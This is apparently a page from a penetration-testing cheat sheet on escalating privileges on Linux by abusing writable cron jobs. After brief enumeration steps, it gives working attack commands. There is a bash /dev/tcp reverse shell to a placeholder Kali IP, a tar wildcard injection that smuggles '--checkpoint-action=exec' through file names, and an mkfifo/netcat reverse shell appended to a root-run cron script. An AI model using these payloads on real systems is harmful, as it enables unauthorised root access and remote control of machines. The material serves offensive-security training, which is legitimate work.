Abusing Cron Jobs

NOTE: Ensure that the user has writable permission to the cronjob file

1

Enumerate crontab

Search system log for cron-related activity

grep -i "CRON" /var/log/syslog

Read the cron job content inside the cronjob directory

cat <Cron Job Name>

Run the application

timeout 61s ./pspy64
2

Setup Netcat listener

3

Inject reverse shell into cronjob

If the cronjob has something similar to the following, just do the following steps in the directory.

(root) CMD (cd /opt/admin && tar -zxf /tmp/backup.tar.gz *)

echo /bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

If the cronjob is running a shell script, add the following line inside

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Kali IP Address> <Kali Port> >/tmp/f" >> <CronJob File Full Path>
PreviousLinuxNextAbusing Password Authentication

Last updated